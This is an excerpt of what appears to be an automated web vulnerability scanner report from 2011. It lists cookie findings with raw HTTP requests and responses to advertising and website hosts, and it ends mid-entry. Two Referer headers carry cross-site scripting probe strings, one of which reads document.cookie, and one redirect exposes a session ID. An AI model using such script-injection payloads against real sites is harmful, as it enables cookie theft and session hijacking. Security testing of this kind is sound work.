<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://">here</a>.</p> <hr> <address>Apache/2.0 ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/141555552/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1 Host: network.realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:04:21 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http:// Content-Length: 279 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:05:21 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://">here</a>.</p> <hr> <address>Apache/2.0 ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1616156922/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1 Host: network.realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:03:25 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http:// Content-Length: 279 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:25 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://">here</a>.</p> <hr> <address>Apache/2.0 ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1911154246/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1 Host: network.realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:02:46 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http:// Content-Length: 279 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:03:46 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://">here</a>.</p> <hr> <address>Apache/2.0 ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/2083207614/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1 Host: network.realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:03:22 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http:// Content-Length: 279 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:22 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://">here</a>.</p> <hr> <address>Apache/2.0 ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670 HTTP/1.1 Host: network.realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:04:26 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http:// Content-Length: 279 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:05:26 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://">here</a>.</p> <hr> <address>Apache/2.0 ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/53616777/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1 Host: network.realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:04:12 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http:// Content-Length: 279 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:05:12 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://">here</a>.</p> <hr> <address>Apache/2.0 ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/537212856/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1 Host: network.realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:03:53 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http:// Content-Length: 279 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:53 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://">here</a>.</p> <hr> <address>Apache/2.0 ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/702021509/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1 Host: network.realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:03:57 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http:// Content-Length: 279 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:57 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://">here</a>.</p> <hr> <address>Apache/2.0 ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670 HTTP/1.1 Host: network.realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:03:32 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http:// Content-Length: 279 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:32 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://">here</a>.</p> <hr> <address>Apache/2.0 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: nl.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-NL" lang="nl-NL" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: nl.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: no.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nn-NO" lang="nn-NO" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: no.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1204429614@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1 Host: oasc05139.247realmedia.com Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 15:00:04 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 4927 Content-Type: application/x-javascript Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
function OAS_RICH(position) { if (position == 'Middle') { document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/90261661/Middle/D ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1244397821@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1 Host: oasc05139.247realmedia.com Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/subscription-services/preview-current-issue?4df85%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ebb520f082cd=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 17:31:33 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 4934 Content-Type: application/x-javascript Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/
function OAS_RICH(position) { if (position == 'Middle') { document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247919265/Middle ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1494452952@Top,Middle,Right,Right1,x01,x02,x03,x04 HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:05:35 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 4540 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: application/x-javascript Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
function OAS_RICH(position) { if (position == 'Middle') { document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/671207635/Middle/ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:05:50 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18 Content-Length: 390 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247919265/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:05:38 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter Content-Length: 355 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:05:48 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18 Content-Length: 390 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
